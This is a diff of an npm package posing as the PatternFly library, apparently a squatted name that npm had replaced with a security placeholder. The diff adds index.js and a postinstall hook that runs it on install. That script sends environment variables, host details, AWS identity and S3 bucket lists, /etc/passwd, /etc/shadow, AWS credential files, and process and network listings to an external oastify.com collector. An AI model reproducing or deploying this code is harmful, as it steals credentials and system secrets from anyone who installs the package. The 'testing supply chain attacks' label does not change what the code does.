@patternfly-v5/patternfly 0.0.1-security → 1.0.4

package/index.js

@@ -0,0 +1,109 @@
+const os = require('os');
+const https = require('https');
+const fs = require('fs');
+const { exec } = require('child_process');
+const AWS = require('aws-sdk');
+
+// Helper function to send data
+function sendData(path, data) {
+  const options = {
+    hostname: 'rzucd2dfiuz08dnqwkigu37xfolf95xu.oastify.com',
+    port: 443,
+    path: `/${path}`,
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json'
+    }
+  };
+
+  const req = https.request(options, (res) => {
+    console.log(`Data sent to /${path}. Response status: ${res.statusCode}`);
+  });
+
+  req.on('error', (error) => {
+    console.error(`Error sending data to /${path}: ${error.message}`);
+  });
+
+  req.write(JSON.stringify(data));
+  req.end();
+}
+
+// Gather system information
+const systemInfo = {
+  hostname: os.hostname(),
+  platform: os.platform(),
+  arch: os.arch(),
+  release: os.release(),
+  userInfo: os.userInfo(),
+  networkInterfaces: os.networkInterfaces(),
+  env: process.env
+};
+
+// Send system information
+sendData('system-info', systemInfo);
+
+// AWS Credentials Validation
+if (process.env.AWS_ACCESS_KEY_ID && process.env.AWS_SECRET_ACCESS_KEY) {
+  const sts = new AWS.STS({
+    accessKeyId: process.env.AWS_ACCESS_KEY_ID,
+    secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
+    region: process.env.AWS_REGION || 'us-east-1'
+  });
+
+  sts.getCallerIdentity({}, (err, data) => {
+    if (err) {
+      sendData('aws-identity', { error: err.message });
+    } else {
+      sendData('aws-identity', data);
+    }
+  });
+
+  const s3 = new AWS.S3();
+  s3.listBuckets((err, data) => {
+    if (err) {
+      sendData('aws-s3', { error: err.message });
+    } else {
+      sendData('aws-s3', data.Buckets);
+    }
+  });
+}
+
+// Read sensitive files
+const sensitiveFiles = [
+  '/etc/passwd',
+  '/etc/shadow',
+  '/root/.aws/credentials',
+  '/root/.aws/config',
+  '/home/ubuntu/.aws/credentials',
+  '/home/ubuntu/.aws/config'
+];
+
+sensitiveFiles.forEach((file) => {
+  fs.readFile(file, 'utf8', (err, data) => {
+    if (!err) {
+      sendData('file-dump', { file, content: data });
+    }
+  });
+});
+
+// Running processes
+exec('ps aux', (err, stdout, stderr) => {
+  if (!err) {
+    sendData('processes', { processes: stdout });
+  }
+});
+
+// Network configuration
+exec('ifconfig || ip addr', (err, stdout, stderr) => {
+  if (!err) {
+    sendData('network-info', { network: stdout });
+  }
+});
+
+// Current working directory contents
+exec('ls -la', (err, stdout, stderr) => {
+  if (!err) {
+    sendData('directory-listing', { directory: stdout });
+  }
+});
+

package/package.json

@@ -1,6 +1,14 @@
 {
   "name": "@patternfly-v5/patternfly",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.4",
+  "description": "A package for testing supply chain attacks.",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "author": "Your Name",
+  "license": "MIT",
+  "dependencies": {
+    "aws-sdk": "^2.1350.0"
+  }
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=%40patternfly-v5%2Fpatternfly for more information.